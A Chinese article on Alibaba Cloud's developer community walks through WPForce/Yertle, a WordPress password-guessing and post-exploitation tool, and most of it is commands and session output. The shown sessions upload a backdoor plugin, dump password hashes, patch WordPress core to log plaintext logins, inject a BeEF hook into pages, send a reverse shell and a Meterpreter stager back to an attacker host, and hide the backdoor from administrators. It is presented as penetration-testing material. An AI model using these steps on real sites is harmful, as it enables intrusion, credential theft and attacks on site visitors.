开发者社区> 玄学酱> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

WPForce——一款 Wordpress 漏洞利用工具

简介: 本文讲的是WPForce——一款 Wordpress 漏洞利用工具,在渗透测试过程中,我们可能会遇到运行WordPress的Web服务器。虽然Web服务器上的大多数WordPress服务器都配置了强大的密码和安全插件,但内部网络很少出现这种情况。
+关注继续查看
本文讲的是WPForce——一款 Wordpress 漏洞利用工具

WPForce一款 Wordpress 漏洞利用工具

在渗透测试过程中,我们可能会遇到运行WordPress的Web服务器。虽然Web服务器上的大多数WordPress服务器都配置了强大的密码和安全插件,但内部网络很少出现这种情况。因此,攻击者经常可以在过时的WordPress版本中找到漏洞,或者就是简单地对管理密码进行猜测。一旦攻击者猜到管理密码,就可以对其他系统进行攻击。除了特权提升之外,还可以使用WordPress本身对客户端发起一些其他攻击。

为了方便测试,我们将使用自己开发的用于测试WordPress的工具——WPForce。WPForce和WPScan相比,具有以下2个优点:

1.与WPScan不同,WPScan会再次执行WordPress的登录页面;

2.WPForce会使用经过身份验证的API调用来测试登录凭据的有效性:

WPForce一款 Wordpress 漏洞利用工具

识别有效的登录凭据后,WPForce套件——Yertle中的配套脚本可用于将后门上传到WordPress服务器上并执行多个后期开发模块。运行Yertle比较简单,只需提供URL,用户名,密码和后门类型即可。虽然有两种类型的后门可供上传,但我们更喜欢-interactive选项:

WPForce一款 Wordpress 漏洞利用工具

一旦我们开始运行脚本,WPForce就将登录到WordPress站点并上传一个插件。也就是说,我们只需要提供-e参数并上传目录名称,就可以随时访问这个后门:

这个插件就会采取类似于SQLmap的os-shell的命令,要查看可用的模块,可以输入“help”或“?”:

os-shell> help
 
Core Commands
=============
 
Command                   Description
-------                   -----------
?                         Help menu
beef                      Injects a BeEF hook into website
exit                      Terminate the session
hashdump                  Dumps all WordPress password hashes
help                      Help menu
keylogger                 Patches WordPress core to log plaintext credentials
keylog                    Displays keylog file
meterpreter               Executes a PHP meterpreter stager to connect to metasploit
quit                      Terminate the session
shell                     Sends a TCP reverse shell to a netcat listener
stealth                   Hides Yertle from the plugins page

我们可以运行的一个有用的后期开发模块是hashdump,hashdump会登录SQL数据库,查询包含密码的哈希值,并返回输出。然后,我们可以破解这些散列,并开始尝试使用这些登录凭证攻击其他系统:

os-shell> hashdump
ID: 1  - Username: admin  Password: $P$BAgwF1u99OZU1iqTgTIrUmBbtIjRMu1  Email: Quaoar@localhost.com
ID: 2  - Username: wpuser  Password: $P$BdcZZVb0ssMccLU1ECFCtUihocqQ0S.  Email: wpuser@localhost.com
ID: 3  - Username: n00py  Password: $P$B0mYQT38IOJtOr/nl4dchdqgCrxsG/.  Email: n00py@protonmail.com
 
os-shell>

不仅可以收集散列,还可以收集明文凭证。通过在WordPress核心中修补PHP文件,我们可以在用户认证时以明文形式记录所有密码:

os-shell> keylogger
This module modifies files within the WordPress core.  Would you like to continue? (Y/n) Y
wp_signon function patched.  Do not run this more than once.  Use 'keylog' to check the log file.
os-shell>

经过警告后,用户将会对WordPress核心进行修改,验证功能将被修补:

WPForce一款 Wordpress 漏洞利用工具

等待用户登录后,我们可以通过键入“keylog”来查看日志文件来查看明文凭据:

os-shell> keylog
2017-03-30 - Username:  && Password:
2017-03-30 - Username: n00py && Password: thisisalsomynetworkpassword

除了查看登录凭据外,我们还可以利用BeEF控制目标主机的浏览器, Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网:

os-shell> beef
This module modifies files within the WordPress core.  Would you like to continue? (Y/n) Y
IP Address: 10.0.1.16
BeEF hook added!  Check BeEF for any hooked clients. Do not run this multiple times.

注入hook后,我们只需要等待用户浏览网站即可,一旦用户浏览网站,这些网站就立马被hook了。接下来,我们就可以发送任何我们想要的JavaScript有效载荷, BeEF包含可以针对客户端启动的大量攻击:

WPForce一款 Wordpress 漏洞利用工具

有效载荷在客户端的浏览器中执行:

WPForce一款 Wordpress 漏洞利用工具

与这些模块一样有用的还有另一种类型的shell,这时我们有两个选项可供选择:常规的反向TCP shell和一个被PHP篡改的shell。要升级到完全交互的shell,只需运行:

os-shell> shell
IP Address: 10.0.1.4
Port: 8080
Sending reverse shell to 10.0.1.4 port 8080
os-shell>

并在所选端口上进行监控:

root@Kali:~/WPForce$ nc -l 8080
bash: no job control in this shell
www-data@Quaoar:/var/www/wordpress/wp-content/plugins/aekpmsu$

如果我们想要一个更换shell,可以加载metasploit并运行:

os-shell> meterpreter
IP Address: 10.0.1.4
Port: 4444
Sending meterpreter stager to connect back to 10.0.1.4:4444
os-shell>

并在metasploit内接收更换:

[*] Started reverse handler on 10.0.1.4:4444
[*] Starting the payload handler...
[*] Sending stage (33068 bytes) to 10.0.1.21
[*] Meterpreter session 1 opened (10.0.1.4:4444 -> 10.0.1.21:60763) at 2017-03-29 20:49:16 -0600

最后,使用WPForce时,有几种方法可以使这个检测工具更加隐蔽。默认情况下,该模块将其自身注册为WordPress中的插件,此插件对管理员来说是可见的:

WPForce一款 Wordpress 漏洞利用工具

要让后门从插件屏幕中“消失”,只需简单的运行命令“隐形”,隐形后,后门仍然可以访问:

os-shell> stealth



原文发布时间为:2017年4月19日
本文作者:xiaohui 
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
0 0
分享一些渗透测试的工具(压箱底的)(附带下载链接)
分享一些渗透测试的工具(压箱底的)(附带下载链接)
0 0
WordPress代码最新网站漏洞修复探讨
2020年,刚刚开始WordPress博客系统被网站安全检测出有插件绕过漏洞,该插件的开发公司,已升级了该插件并发布1.7版本,对以前爆出的漏洞进行了修补,该企业网站漏洞造成的原因是未经许可身份认证的普通用户给以了系统管理员权限。黑客能够以网站管理员的身份进行登陆,并可以将wp企业网站的全部数据表信息恢复为以前的模式,进而上传webshell企业网站木马代码来进行篡改企业网站。现阶段受危害的版本包含最新的WP系统。
0 0
网站漏洞修复对WordPress 致命漏洞注入shell
2019年正月刚开始,WordPress最新版本存在远程代码注入获取SHELL漏洞,该网站漏洞影响的版本是wordpress5.0.0,漏洞的产生是因为image模块导致的,因为代码里可以进行获取目录权限,以及文件包含功能,导致远程代码注入成功。
0 0
网站漏洞扫描 某CMS代码的越权与install.php重置渗透测试漏洞
客户网站前端时间被攻击,网站被劫持到了du博网站上去,通过朋友介绍找到我们做网站的安全防护,我们随即对客户网站进行了全面的渗透测试,包括了网站的漏洞检测与代码安全测试,针对于发现的漏洞进行了修复,包括网站安全部署等等方面,下面我们将这一次的安全应急处理过程分享给有需要的客户。
1387 0
WordPress网站漏洞利用及漏洞修复解决方案
2019年正月刚开始,WordPress最新版本存在远程代码注入获取SHELL漏洞,该网站漏洞影响的版本是wordpress5.0.0,漏洞的产生是因为image模块导致的,因为代码里可以进行获取目录权限,以及文件包含功能,导致远程代码注入成功。
1554 0
+关注
玄学酱
这个时候,玄酱是不是应该说点什么...
文章
问答
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载